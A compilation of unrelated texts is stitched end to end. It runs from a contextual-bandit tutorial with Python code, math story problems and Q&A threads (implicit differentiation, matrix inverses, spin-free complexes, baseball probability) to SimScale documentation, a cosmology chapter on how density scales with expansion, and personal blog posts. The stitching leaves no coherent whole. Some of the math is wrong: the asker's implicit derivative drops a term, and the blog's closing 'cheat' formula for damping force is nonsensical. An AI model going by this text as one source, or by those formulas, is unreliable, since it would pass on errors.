$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
And we select the bandit which maximizes $\theta(x)$, except that, with probability $\epsilon$, we select a random action instead (excluding the greedy action, which in our case means drawing the other arm).
The code for this is not very complicated:
import numpy as np
from sklearn.linear_model import LogisticRegression

# Logistic Regression with e-greedy policy class
class EGreedyLR:
    # initialization
    def __init__(self, epsilon, n_bandits, buffer_size=200):
        # storing epsilon, number of bandits, and buffer size
        self.epsilon = epsilon
        self.n_bandits = n_bandits
        self.buffer_size = buffer_size

    # function to fit and predict from a df
    def fit_predict(self, data, actual_x):
        # logistic regression object
        logreg = LogisticRegression(fit_intercept=False)
        # fitting to data
        logreg.fit(data['x'].values.reshape(-1,1), data['reward'])
        # returning probabilities
        return logreg.predict_proba(actual_x)[0][1]

    # decision function
    def choose_bandit(self, round_df, actual_x):
        # enforcing buffer size
        round_df = round_df.tail(self.buffer_size)
        # if we have enough data, calculate best bandit
        if round_df.groupby(['k','reward']).size().shape[0] == 4:
            # predicting for each of our bandits' datasets
            bandit_scores = round_df.groupby('k').apply(self.fit_predict, actual_x=actual_x)
            # get best bandit
            best_bandit = int(bandit_scores.idxmax())
        # if we do not have enough data, the best bandit will be random
        else:
            best_bandit = int(np.random.choice(list(range(self.n_bandits)),1)[0])
        # choose greedy or random action based on epsilon
        if np.random.random() > self.epsilon:
            return best_bandit
        else:
            return int(np.random.choice(np.delete(list(range(self.n_bandits)), best_bandit),1)[0])
Let us see a run of this algorithm. The green and red shaded areas show us which bandit should be played by an optimal strategy.
As we may see over multiple runs, it can take a long time for the e-greedy algorithm to start selecting the arms at the right times. It is very likely to get stuck on a suboptimal action for a long time.
Thompson Sampling may offer more efficient exploration. But how can we use it?
## Algorithm 2: Online Logistic Regression by Chapelle et al.
In 2011, Chapelle & Li published the paper “An Empirical Evaluation of Thompson Sampling”, which helped revive interest in Thompson Sampling by showing favorable empirical results in comparison to other heuristics. We’re going to borrow the Online Logistic Regression algorithm (Algorithm 3) from the paper. Basically, it’s a Bayesian logistic regression where we define a prior distribution for our weights $\beta_0$ and $\beta_1$, instead of just learning a point estimate for them (the expectation of the distribution).
So, our model, just like the greedy algorithm, is:
$\theta_k(x) = \frac{1}{1 + exp(-f(x))}$
where
$f(x) = \beta_0 + \beta_1 \cdot x + \epsilon$
but the weights are actually assumed to be distributed as independent Gaussians:
$\beta_i \sim \mathcal{N}(m_i, q_i^{-1})$
We initialize all $q_i$’s with a hyperparameter $\lambda$, which is equivalent to the $\lambda$ used in L2 regularization. Then, at each new training example (or batch of examples) we make the following calculations:
1. Find $\textbf{w}$ as the minimizer of $\frac{1}{2}\sum_{i=1}^{d} q_i(w_i - m_i)^2 + \sum_{j=1}^{n} \log(1 + \exp(-y_j w^T x_j))$
2. Update $m_i = w_i$ and perform $q_i = q_i + \sum_{j=1}^{n} x_{ij}^2 p_j(1-p_j)$ where $p_j = (1 + \exp(-w^T x_j))^{-1}$ (Laplace approximation)
There is some heavy math here, but in essence we have altered the logistic regression fitting process to accommodate distributions for the weights. Our Normal priors on the weights are iteratively updated, and as the number of observations grows, our uncertainty over them is reduced.
We can also increase incentives for exploration or exploitation by defining a hyperparameter $\alpha$, which multiplies the variance of the Normal posteriors at prediction time:
$\beta_i \sim \mathcal{N}(m_i, \alpha \cdot q_i^{-1})$
With $0 < \alpha < 1$ we reduce the variance of the Normal posteriors, inducing the algorithm to be greedier, whereas with $\alpha > 1$ we prioritize exploration. Implementing this algorithm by hand is a bit tricky. If you want more polished code, with many possible improvements, I would recommend skbayes. For now, let us use my handcrafted OLR:
import numpy as np
from scipy.optimize import minimize

# defining a class for our online Bayesian logistic regression
class OnlineLogisticRegression:
    # initializing
    def __init__(self, lambda_, alpha, n_dim):
        # the only hyperparameter is the deviation on the prior (L2 regularizer)
        self.lambda_ = lambda_; self.alpha = alpha
        # initializing parameters of the model
        self.n_dim = n_dim
        self.m = np.zeros(self.n_dim)
        self.q = np.ones(self.n_dim) * self.lambda_
        # initializing weights
        self.w = np.random.normal(self.m, self.alpha * (self.q)**(-1.0), size=self.n_dim)

    # the loss function
    def loss(self, w, *args):
        X, y = args
        return 0.5 * (self.q * (w - self.m)).dot(w - self.m) + np.sum([np.log(1 + np.exp(-y[j] * w.dot(X[j]))) for j in range(y.shape[0])])

    # the gradient
    def grad(self, w, *args):
        X, y = args
        return self.q * (w - self.m) + (-1) * np.array([y[j] * X[j] / (1. + np.exp(y[j] * w.dot(X[j]))) for j in range(y.shape[0])]).sum(axis=0)

    # method for sampling weights
    def get_weights(self):
        return np.random.normal(self.m, self.alpha * (self.q)**(-1.0), size=self.n_dim)

    # fitting method
    def fit(self, X, y):
        # step 1, find w
        self.w = minimize(self.loss, self.w, args=(X, y), jac=self.grad, method="L-BFGS-B", options={'maxiter': 20, 'disp': True}).x
        self.m = self.w
        # step 2, update q (Laplace approximation)
        P = (1 + np.exp(-X.dot(self.m))) ** (-1)
        self.q = self.q + (P * (1 - P)).dot(X ** 2)

    # probability output method, using weights sample
    def predict_proba(self, X, mode='sample'):
        # sampling weights after update
        self.w = self.get_weights()
        # using weight depending on mode
        if mode == 'sample':
            w = self.w  # weights are samples of posteriors
        elif mode == 'expected':
            w = self.m  # weights are expected values of posteriors
        else:
            raise Exception('mode not recognized!')
        # calculating probabilities
        proba = 1 / (1 + np.exp(-1 * X.dot(w)))
        return np.array([1 - proba, proba]).T
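To make the decision rule concrete, here is a minimal sketch (my own naming and hyperparameter values, not from the original post) of one Thompson Sampling round with one OLR per bandit; note the targets are encoded as ±1, which is what the loss above expects:
# one OLR model per bandit; lambda_=1.0 and alpha=1.0 are arbitrary choices
models = {k: OnlineLogisticRegression(lambda_=1.0, alpha=1.0, n_dim=1) for k in (0, 1)}

def ts_choose(x):
    # sample weights from each posterior, pick the arm with the highest prediction
    scores = {k: m.predict_proba(np.array([[x]]), mode='sample')[0][1]
              for k, m in models.items()}
    return max(scores, key=scores.get)

# after observing a reward for arm k in context x:
# models[k].fit(np.array([[x]]), np.array([1]))   # use -1 for "no reward"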
The following plot shows the Online Logistic Regression estimate for a simple linear model. The plot at the left-hand side shows the Normal posterior of the coefficient after fitting the model to some data. At the right-hand side, we can observe how the uncertainty in our coefficient translates to uncertainty in the prediction.
This way, it is very simple to use Thompson Sampling: we perform an OLR for each bandit, take a sample of the posterior of $\beta$, get the sampled output and choose the bandit with the highest prediction! Let us check one simulation:
TS shows a learning curve, but rapidly converges to the right decisions. We can control the amount of exploration using $\alpha$, with the trade-off of possibly getting stuck on a suboptimal strategy or incurring heavy costs to better explore the set of actions at our disposal. You can fork the code at my GitHub and run the simulation many times with the parameters of your choosing.
When I first learned this algorithm, one thing that made me very curious is how the posterior distributions of the weights change over time. Let us take a look!
## Visualizing the learning process
Let us visualize how the learning progresses and the model represents uncertainty. The following plot shows another episode using TS as the policy, along with the posterior distributions for $\beta_1$ for each bandit.
We see that in the first rounds our output probabilities have very large uncertainty and no clear direction. Also, our priors have large intersections, as the model is not very certain about its weights. As the rounds pass, we see that we effectively learn distributions for the weights and reduce our uncertainty around the output probabilities. When the model has low uncertainty, we start exploiting the bandits, choosing the best in each context.
## Regret analysis
Finally, as in the last post, let us analyze the regret of the two policies with a longer simulation. We now draw the context from a uniform distribution. As simulations are expensive, particularly for TS (due to the Online Logistic Regression), we run only one simulation. We also add buffers to the algorithms, so they can remember only the most recent draws. The regret plot for both policies follows:
## Conclusion
In this tutorial, we introduced the Contextual Bandit problem and presented two algorithms to solve it. The first, $\epsilon$-greedy, uses a regular logistic regression to get greedy estimates of the expected rewards $\theta(x)$. The second, Thompson Sampling, relies on the Online Logistic Regression to learn an independent normal distribution for each of the linear model weights $\beta_i \sim \mathcal{N}(m_i, q_i^{-1})$. We draw samples from these Normal posteriors in order to achieve randomization for our bandit choices.
In this case, although Thompson Sampling presented better results, more experiments may be needed to declare a clear winner. The number of hyperparameters is the same for both methods: the regularization parameter $\lambda$ and the buffer size are shared, while the $\epsilon$-greedy strategy adds $\epsilon$ and Thompson Sampling adds $\alpha$. Thompson Sampling may achieve the best results, but, in my experiments, it sometimes diverged depending on the hyperparameter configuration, completely inverting the correct bandit selection. The toy problem presented in this Notebook is very simple and may not be representative of the wild either, so we may be better off trusting the results in the Chapelle et al. paper. Last but not least, the time for fitting the Online Logistic Regression is an order of magnitude larger than fitting a regular logistic regression, which could still be improved by using a technique like Stochastic Gradient Descent. In a big data context, it may be better to use an $\epsilon$-greedy strategy for a while, then change to full exploitation at some point given business knowledge. An $\epsilon$-decreasing strategy may be a good option as well.
|
|
165 Answered Questions for the topic Story Problem
11/09/15
#### What is the width of the spill?
A pilot of a small plane was flying over an oil spill at an altitude of 10,000 feet. He found that the near edge of the spill had an angle of depression of 58 degrees and the far edge of the spill... more
11/09/15
#### What would the dimensions of the hexagonal base be?
A farmer plans to build a regular hexagonal corn crib with sides 8 feet high. If he wants the crib to hold up to 1,000 bushels of corn, what would the dimensions of the hexagonal base be? (1,000... more
11/09/15
#### How tall is the antenna?
A broadcast antenna is located at the top of a building 1,000 feet tall. From a point on the same horizontal plane as the base of the building, the angles of elevation of the top and bottom of the... more
11/09/15
#### How much farther must she fly to get to Indianapolis?
A pilot intends to fly a distance of 175 miles from Chicago to Indianapolis. She begins 21 degrees off her course and proceeds 70 miles before discovering her error. After correcting her course,... more
11/09/15
#### Through what angle does the observer see the pole?
One end of a 9.3 foot pole is 13.6 feet from an observer's eyes, and the other end is 17.4 feet from the observer's eyes. Through what angle does the observer see the pole?
11/07/15
#### Scott works as a tutor for $9 an hour and as a waiter for $18 an hour; he worked a combined total of 83 hours. t = tutor hours
I used to remember how to do this and now I am drawing a blank. Please help.
10/26/15
#### The Brown's bus left at 9 A.M. And travelled for 150 miles at 57.8 mph. How fast must the bus travel the remaining distance to reach Cincy at 3:15 pm?
For the 280- mile trip from Cleveland to Cincinnati for the Monday night Battle-Of-Ohio Football Game between the Browns and the Bengals, the Browns bus left at 9 A.M. and traveled for 150 miles at... more
10/22/15
#### Need help with distance story problem
A train leaves Little Rock, AR, and travels north at 55 kilometers an hour. Another train leaves at the same time and travels south at 90 kilometers an hour. How long will it take before they are 290... more
08/12/15
#### six times the sum of a number and 3 is 12 less than 12 times the number
This is all. Thank you.
08/09/15
#### If i played a game for a total of 388 hrs over 1 yrs time and am awake 16hrs/day how many hours a day was spent playing the game?
Looking for how many hrs per day were spent playing game?
06/27/15
#### A person drives 700 mile with fuel cost of 3 dollars per gallon and the vehicle gets 12 miles per gallon how much is total cost in dollars ?
A person drives 700 mile with fuel cost of 3 dollars per gallon and the vehicle gets 12 miles per gallon how much is total cost in dollars ?
06/17/15
#### Advanced Work Rate Word Problem
" A man can lay a concrete sidewalk in 5 days; his assistant can lay the same sidewalk in 8 days. After working together for 2 days, the man is called away. How long will it take the assistant to... more
|
|
# Compute the following implicit derivative: $\displaystyle \frac{x}{1-x}-y^2+3x^3=5y$
It's not a particularly challenging derivative, but I would like to know whether or not my approach is correct.
I assumed, prior to the process of differentiation that $y$ is a continuous function of $x$, and hence I applied the chain rule in the instances where $y$ occurred, and also therefore differentiated every term with respect to $x$
So, let's begin:
Term $1$: $\displaystyle\frac{d}{dx}\left(\frac{x}{1-x}\right)=(1-x)^{-2}$
Term $2$: At this point, I did the following: I let $u$ be a continuous function of $x$ such that $u=y^2$, and hence I applied the chain rule, which states that $\displaystyle \frac{du}{dx}=\frac{du}{dy}\times\frac{dy}{dx}$, hence $\displaystyle \frac{d}{dx}(y^2)=2y\frac{dy}{dx}$
Term $3$: $\displaystyle \frac{d}{dx}(3x^3)=9x^2$
Term $4$: Again, the chain rule is applied to attain $\displaystyle \frac{d}{dx}(5y)=5\frac{dy}{dx}$
And from here I solved for $\displaystyle \frac{dy}{dx}$, which is:
$\displaystyle (1-x)^{-2}+9x^2=5\frac{dy}{dx}-2y\frac{dy}{dx}$
$\displaystyle\frac{dy}{dx}=\frac{9x^2}{(5-2y)(1-x)^2}$
So here are the questions; firstly, when differentiating implicit functions, will you always differentiate with respect to only one variable? Secondly, for the chain rule, is it a good idea to substitute, for example; $u=y^2$ or $n=5y$ and then calculate $\displaystyle \frac{du}{dx}$ or $\displaystyle \frac{dn}{dx}$, each time I come across a variable that is not $x$ (in this example)? And lastly, will this approach work for the differentiation of most, if not every, implicit function?
Any responses are appreciated.
• Are we sure that $\dfrac{d}{dx} \dfrac{x}{1-x}=(1-x)^{-2}$ I wasn't able to check with pen and paper but it looks to me like it is $0$ if we apply the quotient rule. – Deniz Tuna Yalçın Sep 1 '17 at 7:39
• Yes you were right OK – Deniz Tuna Yalçın Sep 1 '17 at 7:40
• For your second question about substituting, I think it is safer to do it that way, but I feel like it is easier to use $y'$ instead of the d notation and skip the intermediate steps, like (say) $x^2+y^2=1 \rightarrow 2x+2yy'=0$ (easier than substituting, although riskier). – Deniz Tuna Yalçın Sep 1 '17 at 7:43
• Makes sense, thanks for the advice! @DenizTunaYalçın – joshuaheckroodt Sep 1 '17 at 7:44
• You're welcome:)) – Deniz Tuna Yalçın Sep 1 '17 at 7:45
$$\frac{x}{1-x}-y^2+3x^3=5y \tag 1$$ $$\left(\frac{1}{1-x}+\frac{x}{(1-x)^2}\right)dx -2y\:dy+9x^2dx=5dy \tag 2$$ $\frac{1}{1-x}+\frac{x}{(1-x)^2} = \frac{1}{(1-x)^2}$ $$(2y+5)dy=\left(\frac{1}{(1-x)^2}+9x^2\right)dx$$ $$(2y+5)dy=\frac{1+9x^2(1-x)^2}{(1-x)^2}dx$$ $$y'=\frac{dy}{dx}=\frac{1+9x^2(1-x)^2}{(1-x)^2(2y+5)}$$
|
|
# Momentum Sources
Momentum sources can be used to simulate fans, ventilators and other similar devices without having to model the exact geometry and motion of the device. For instance, one may want to model an axial fan whose dimensions and output velocity are known. With this feature it is possible to assign the velocity output to a cylinder with the same cross section as the fan.
## Preparation
• Momentum sources can be used in every analysis type, except Compressible and Multiphase.
• A momentum source must be assigned to a volume, defined through a geometry primitive (Cartesian box, sphere, or cylinder) or a cell zone.
• It is recommended to refine the mesh in the vicinity of the source (e.g. refinement region downstream of the source), in order to better capture the dynamics of the flow.
## Creation of a momentum source
• In the simulation tree, navigate to Advanced Concepts and add a Momentum Source.
• Simscale currently supports only the Average velocity momentum source. This simulates a linear momentum defined by a velocity vector $$\vec{u} = [u_x, u_y, u_z]$$.
|
|
Question
# To multiply: The given expression. Then simplify if possible. Assume that all variables represent positive real numbers. Given: An expression: $\displaystyle\sqrt{3}\left(\sqrt{27}-\sqrt{3}\right)$
To multiply:
The given expression. Then simplify if possible. Assume that all variables represent positive real numbers.
Given:
An expression: $$\displaystyle\sqrt{{3}}{\left(\sqrt{{27}}-\sqrt{{3}}\right)}$$
2020-11-24
Calculation:
To find the product of given expression, we will use distributive property
$$\displaystyle{a}{\left({b}+{c}\right)}={a}{b}+{a}{c}$$ as shown below:
$$\displaystyle\sqrt{{3}}{\left(\sqrt{{27}}-\sqrt{{3}}\right)}$$ (Given expression)
$$\displaystyle\Rightarrow\sqrt{{3}}\times\sqrt{{27}}-\sqrt{{3}}\times\sqrt{{3}}$$ (Using distributive property)
$$\displaystyle\Rightarrow\sqrt{{{3}\times{27}}}-\sqrt{{{3}\times{3}}}$$ (Applying the rule $\sqrt[n]{a} \times \sqrt[n]{b} = \sqrt[n]{ab}$)
$$\displaystyle\Rightarrow\sqrt{{81}}-\sqrt{{9}}$$
$$\displaystyle\Rightarrow\sqrt{{{9}^{2}}}-\sqrt{{{3}^{2}}}$$
$$\displaystyle\Rightarrow{9}-{3}$$ (Applying the rule $\sqrt[n]{a^n} = a$)
$$\displaystyle\Rightarrow{6}$$
Therefore, the product of the given expressions would be 6.
|
|
Math Genius: Diagonal Elements of Inverse of Symmetric Matrix.
Are there any shortcuts to calculate the diagonal elements of the inverse of a symmetric matrix:
$$\operatorname{diag}\left((X^T\cdot X)^{-1}\right) = \ ?$$
$X$ is probably a sparse matrix.
($$X^{T}X$$ is a symmetric matrix.)
|
|
# Are high spin complexes and spin free complexes the same thing?
While solving some Coordination Compounds problems, I came across a problem that asked
Select which complex is high spin or spin free octahedral complex.
The term 'spin free' sounds like a complex with no unpaired electrons, and I know high spin complexes are those which have unpaired electrons. But the question was single-correct, and this got me confused.
Do the terms high spin and spin free bear the same meaning?
Spin Free Complex means that the electrons are free to spin! High spin complexes are the ones with Weak Field Ligands which aren't able to pair up electrons of the central ion.
Hence the 2 terms are usually used synonymously. On the same lines Low Spin Complexes and Spin Paired Complexes are used synonymously!
• Is this a regional dialect? I do find sources where "spin-free" is used in this way, but at least in US-English, "X-free" would mean something that lacks, or is free of, "X", see guilt-free, fat-free, worry-free. Oct 27 '21 at 15:16
• I am not really sure if it's taken from a dialect but that's what it's used for in chemistry. I 100% agree that is confusing, high spin complex is a much better word to use. Oct 27 '21 at 17:35
In a paper by the renowned chemist, F. Albert Cotton,
"Magnetic Investigations of Spin-free Cobaltous Complexes. III. On the Existence of Planar Complexes"
they investigate "spin-free" complexes, which the authors define as complexes with three unpaired electrons. Following this definition, spin-free does not necessarily imply high-spin, as in the case of some octahedral Cr(III) complexes, which have three unpaired electrons that can occupy the $$t_{2g}$$ energy level, making it low spin.
Side Note:
This definition of spin-free may be how F. A. Cotton defined it for his paper; this is not a claim that it is representative of the entire field. Additionally, this paper is from the 1960s, so contemporary definitions may differ.
|
|
OpenStudy (anonymous):
a pro baseball player has a 30% chance of getting a hit on any at-bat. he swings 12 times. whats the probability that he doesnt get a hit?
OpenStudy (anonymous):
If he has a 30% chance of getting a hit, then what is the probability that he does *not* get a hit? 70%. This problem is asking you the probability that that event takes place 12 times in a row. Repeated events like that require you to multiply the probability each time, so we get 0.70^12. Similarly, the odds of getting a hit all 12 times would be 0.30^12. Both are incredibly small numbers if you work them out, which reinforces the idea that the vast majority of the time you'll end up in the middle.
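For concreteness, a quick check in Python (values rounded):
p_no_hit = 0.70 ** 12    # ~0.0138, about a 1.4% chance of going hitless
p_all_hits = 0.30 ** 12  # ~5.3e-7
print(p_no_hit, p_all_hits)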
OpenStudy (anonymous):
thanks
|
|
$$\require{cancel}$$
# 13. The Evolution of Mass-Energy Density and a First Glance at the Contents of the Cosmos
We've seen that the rate of change of the scale factor depends on the mass density $$\rho$$. In order to determine how the scale factor evolves with time, we thus need to know how the density evolves as the scale factor changes. In this section we'll work that out for three cases. The first two are collections of particles: 1) non-relativistic particles, by which we mean those with rest-mass energy ($$mc^2$$) much greater than kinetic energy, and 2) relativistic particles, by which we mean particles with much greater kinetic energy than rest-mass energy. The former we call "matter" and the latter we call "radiation." The third one is much more exotic: a cosmological constant.
These are the three categories we need to describe the evolution of mass-energy density for all the significant components of the standard cosmological model. The relative contributions of these components to the total mass-energy density today, and over 13.7 billion years ago, are shown in the graphic to the right, as cosmologists have estimated them using data from NASA's Wilkinson Microwave Anisotropy Probe (WMAP) satellite. We'll call these components out as we consider Matter, Radiation, and the cosmological constant.
#### Matter
Let's begin by thinking about how the energy density of the gas in this room would evolve under expansion. Before we even get to that though, let's compare the kinetic energy of a typical Nitrogen molecule in the room to its rest-mass energy. The kinetic energy is roughly given by $$k_B T_{\rm room} \simeq 1/40$$eV where eV is a unit of energy called an electron Volt, equal to the kinetic energy that an electron gains crossing a potential difference of 1 Volt. To get the rest mass, note that Nitrogen's most abundant isotope has 7 protons and 7 neutrons, and the molecule is two Nitrogen atoms so its mass is about 28 times the mass of the proton. The proton mass is almost $$1 \times 10^9$$eV/$$c^2$$, so the Nitrogen molecule rest mass energy is roughly $$mc^2 = 28 \times 10^9$$eV. You can see that its rest mass energy is much greater than its kinetic energy.
In thinking about the energy density of a gas of particles we need to keep track of the rest mass energy and the kinetic energy. However, for non-relativistic particles, those moving much more slowly than the speed of light, like the particles in the gas in this room, the kinetic energy is tiny compared to the total energy and we can ignore it. That makes our calculation very straightforward. Expansion will dilute the number of particles by the increase in volume.
Box $$\PageIndex{1}$$
Exercise 13.1.1: For a collection of particles all of the same mass, $$m$$, their energy density is given by:
\begin{equation*} \begin{aligned} \rho = m n c^2 \end{aligned} \end{equation*}
where $$n$$ is the number density of the particles. In your own words, argue that $$n \propto a^{-3}$$, and hence $$\rho \propto a^{-3}$$.
In the WMAP graphic, "Atoms" and "Dark Matter" are both forms of Matter. Atoms are just the usual matter we are familiar with from everyday life. They are the elements of the periodic table. We actually don't know what the dark matter is. But there are many different observations that can be most easily understood if we assume there is a significant amount of some unknown, not-yet-detected, type of non-relativistic particle that contributes more to the mass-energy of the universe than atoms do by a factor of 5.
#### Radiation
For any collection of particles the energy density is given by $$\rho = \bar E n$$ where $$\bar E$$ is the average energy of the particles. For massless particles, $$E = pc$$ so $$E \propto 1/a$$ for each particle, and therefore $$\bar E \propto 1/a$$. As long as particles are not being destroyed, just like for the non-relativistic particles, $$n \propto 1/a^3$$. Putting this together, for relativistic particles we have $$\rho \propto a^{-4}$$. In the WMAP graphic, Photons and Neutrinos both count as radiation. Photons are the clearest case since, as they have no mass, their kinetic energy is always much greater than their rest-mass energy. Neutrinos are subatomic particles that do have a small amount of mass, but for much of the history of the universe we expect that these particles have much greater kinetic energy than rest-mass energy and hence qualify as radiation.
#### The Cosmological Constant
It is a logical possibility, consistent with Einstein's equations, that there is an energy density associated with space itself; i.e., a certain amount of energy in every cubic centimeter, an amount that does not change with time. Thus, by definition, for a cosmological constant the mass-energy density is independent of the scale factor: $$\rho \propto a^0$$. As we will see, there is evidence supporting the existence of a non-zero cosmological constant. Einstein considered this possibility early on as a means to explain why the universe is static (as he thought it was), rather than expanding or contracting, when he introduced the cosmological constant via an additional term in his field equations.
Einstein's reasons for introducing the cosmological constant turned out to be unfounded. In 1929 Edwin Hubble reported his inferences of recession velocity and distance for a set of (relatively nearby) galaxies, that showed a roughly linear trend of increasing velocity with distance, just as one would expect from a uniform expansion. Einstein missed the opportunity to predict the discovery of the expansion of the universe, a missed opportunity he referred to as his greatest blunder.
The cosmological constant though has refused to die. There are two reasons for this. The first is that if one tries to calculate, using quantum field theory, the energy density that is in every cubic centimeter of space from the zero-point energy of all the quantum fields, one gets an enormously large energy density, larger than observational limits by a factor of about $$10^{120}$$. This huge embarrassment of modern physics is called the "cosmological constant problem."
The second is that over the past twenty years strong evidence has emerged that the dominant contribution to the mean energy density of the universe in the current epoch is something that is behaving a lot like a cosmological constant. As we will see soon, the observational evidence comes from inferences of the relationship between distance and redshift that indicate the expansion rate is accelerating; i.e., that $$\ddot a > 0$$. Radiation and matter lead to deceleration, while a cosmological constant can produce acceleration (as you will show in the Box below). The first claims of acceleration from redshift-distance inferences were published in 1998, and were based on observations of Type 1a supernovae. Three of those leading these efforts were awarded the Nobel Prize in Physics in 2011 for their work. The "Dark Energy" label in the WMAP graphic is a more general term than "cosmological constant." It is the general name for the component of the universe that is causing acceleration in the current epoch. A cosmological constant is a very specific kind of dark energy.
Box $$\PageIndex{2}$$
Exercise 13.2.1: Show that for an expanding universe with $$k=0$$ and only matter or radiation that $$\ddot a < 0$$.
Exercise 13.2.2: Show that for an expanding universe with $$k=0$$ and only a cosmological constant that $$\ddot a > 0$$.
#### Summary
The universe has components that change with scale factor in three different ways:
1. Non-relativistic matter, aka "Matter" has a mass-energy density $$\rho \propto a^{-3}$$,
2. Relativistic matter, aka "Radiation", has a mass-energy density $$\rho \propto a^{-4}$$, and
3. Dark Energy, whose mass-energy density evolves much more slowly; for the specific case of a cosmological constant $$\rho \propto a^0$$.
These different behaviors lead to them having different mixes over time in the history of the universe, and explain the differences in the two pie charts in the WMAP graphic. There are still neutrinos and photons around in the current epoch, but their contributions are just so small they have not been included in the graphic. Their steeper dependence on $$a$$ means that at earlier and earlier times they contributed a greater and greater share of the total mass-energy budget.
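As a quick numerical illustration of these scalings, here is a small Python sketch; the present-day density fractions below are rough, commonly quoted values assumed purely for illustration, not numbers taken from this text:
# rough present-day fractions of the total density (assumed for illustration)
Omega_m, Omega_r, Omega_L = 0.3, 1e-4, 0.7

def fractions(a):
    # matter, radiation, and cosmological constant scale as a^-3, a^-4, a^0
    m, r, L = Omega_m * a**-3, Omega_r * a**-4, Omega_L
    total = m + r + L
    return m / total, r / total, L / total

for a in (1e-5, 1e-3, 1.0):
    print(a, [round(f, 3) for f in fractions(a)])
# radiation dominates at small a, then matter, then the cosmological constant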
HOMEWORK Problems
Note: Unless directed otherwise, in these first 3 problems assume that $$k = 0$$ and $$\rho \propto a^{-3}$$.
Problem $$\PageIndex{1}$$
In the standard model of cosmology the universe has gone through at least three different "eras." These are the radiation-dominated era, the matter-dominated era and the dark energy-dominated era. In the radiation-dominated era, for example, more mass-energy comes from radiation than from matter or dark energy. Think about how energy density evolves with scale factor for each of these components and identify which era was first, which second and which third (that is, specify the temporal ordering). Make a sketch of $\log(a)$ vs. $\log(\rho)$ for each of the components, all on the same graph. On the graph indicate the ranges of scale factor for each of the three eras. I am only looking for something qualitatively correct here. Do not worry about having the right value of the scale factor for the transitions, just have the eras in order. Your axes need not have any numbers on them, but do indicate where on the $\log(a)$ axis today is.
Problem $$\PageIndex{2}$$
From the time referred to in the lower pie chart in the WMAP graphic, to "TODAY", the universe has expanded by a factor of about 1100. Given that information, and assuming that over this time period there has been negligible destruction or creation of photons, atoms, and dark matter, about what fraction of the mass-energy density today is contributed by photons?
Problem $$\PageIndex{3}$$
Later we will study the epoch of "big bang nucleosynthesis" (BBN) when most of the Helium in the universe was created, as well as trace amounts of some other light elements. The scale factor was about one million times smaller in this epoch than it was at the time referred to in the lower pie chart in the WMAP graphic. Assuming that neutrino mass can be ignored between these two different times, what is the ratio of radiation mass-energy density to matter mass-energy density at the epoch of BBN?
|
|
# 2017-18 Cross over recap.
Been a long time since I’ve posted anything; mostly busy working on my projects. An upcoming Cube that should become pretty interesting. I’ll post about it once things actually get somewhere… this time I’m waiting until parts actually show up.
I did some handwork a few weeks ago, making some masks. Which I’ll make a full post about one of these days. This was the end product.
These I 3d printed and eventually filled, sanded and painted.
Lizard Truth is finally a small business! Registered only just a few weeks ago. Though maybe completely useless, as the reasons for making the business fell apart. But we’ll see.
I started to design an overcomplicated and overly expensive laser cutter, and I even paid for it… We’ll see if it ever ends up going anywhere. But a fun project regardless.
I’ll attempt to document my laser cutter. As I build. But not promising 😉
# Reverse Copy Hunting
So, back in the day, when I first started making this website… nearly a year now, so my host provider tells me (cause they wanna get paid)… I threw up some random image (the Mary lizard) I found once while duckduckgoing “lizard truth”. I couldn’t find an original creator for it. Thankfully, due to metadata saved in the file, as well as its original file name, the original creator, in an attempt to check who stole their shit, was able to find my website! And instead of being a dick like most IP owners, they very politely emailed me to tell me who they were and finally provided a link with their content up for sale. So I very gratefully updated their credit and now want to share with the rest of you this random internet person’s redbubble. Please support this artist!
Thanks again HiddenStash for not being an asshole!
Oh here is their internet website
# Virtual Work
So We’ve talked about mdc equations before in math monkey. They are usually in the form $$m\: \ddot{x} + d\: \dot{x} + cx\: = 0\:$$
$m$ being the mass, $d$ the dissipation (damping), and $c$ the spring constant.
I won’t go into how one builds this equation up; there are many ways, and in Math Monkey I covered pretty in-depth how to do it with the basic mathematical pendulum. One of these days I may get into a more in-depth analysis of maybe a car or a real double pendulum. Anyway, a part that wasn’t explained at all was the “Virtual Work” of the system, namely the $Q$ part of the Lagrange equation
$$\mathrm{Q}=\frac{d}{dt}\frac{\partial\mathrm{L}}{\partial\dot{\phi}}-\frac{\partial\mathrm{L}}{\partial\phi}$$
So whats Q? Well according to wiki:
Virtual work arises in the application of the principle of least action to the study of forces and movement of a mechanical system. The work of a force acting on a particle as it moves along a displacement will be different for different displacements.
Or whatever that means. In mathemagics, it means this:
$$Q = \displaystyle\sum_{i=1}^{n}\mathrm{M_i(t)}\frac{\partial\phi}{\partial x}+\mathrm{F_i(t)}\frac{\partial r}{\partial x}+\mathrm{F_{di}(t)}\frac{\partial r_d}{\partial x}+\mathrm{R_i(t)}\frac{\partial r}{\partial x}$$
Namely, the sum of the moment, external force, friction, and damping terms, each multiplied by the partial derivative of its directional vector component. Or, well, that’s what it looks like when I read it, anyway. I still haven’t quite got the hang/understanding of it. But I’ve never claimed to know what I’m doing. Just that I look like I know what I’m doing 😉
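If you want to sanity-check how the damping term enters through $Q$, here’s a small sympy sketch (mine, thrown together for this post, not from my notes) that plugs the generalized force into the Lagrange equation above:
import sympy as sp

t = sp.symbols('t')
m, d, c = sp.symbols('m d c', positive=True)
x = sp.Function('x')(t)
xdot = sp.diff(x, t)

# Lagrangian of a mass on a spring: kinetic minus potential energy
L = sp.Rational(1, 2)*m*xdot**2 - sp.Rational(1, 2)*c*x**2
Q = -d*xdot   # generalized force from the damper's virtual work

# d/dt(dL/dxdot) - dL/dx = Q  ->  m x'' + d x' + c x = 0
eom = sp.diff(sp.diff(L, xdot), t) - sp.diff(L, x) - Q
print(sp.expand(eom))   # m*x'' + d*x' + c*x, i.e. the mdc equation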
Well, to calculate all this out there’s quite a bit of work to do. I recently had to do such a thing for a system I had to describe, and while digging through my notes I happened upon a trick I seem to have written to myself on an exam cheat sheet. Normally, you would calculate the vectorial force (for damping in this example) and multiply it with its directional derivative, like so:
$$\mathrm{F_{di}(t)}\frac{\delta\mathrm{r_d}}{\delta\mathrm{x}}$$
F could look like this (or rather, does):
$$\mathrm{\underline{F}_{d}(t)} = -d \dot{x} \vec{e_x}$$
and r would look like maybe this:
$$\delta\mathrm{r} = x\vec{e_x} +y \vec{e_y}$$
So you can imagine there are a bunch of steps to get this done: each partial derivative, blah blah, multiplying, blah blah.
Well good news everyone!
I guess it’s not a surprise cause I already said I found a cheat. Well here it is:
$$\mathrm{\underline{F}_{d}(t)} = -d \Delta\Delta\dot{x} = -d \Delta\dot{x}^2$$
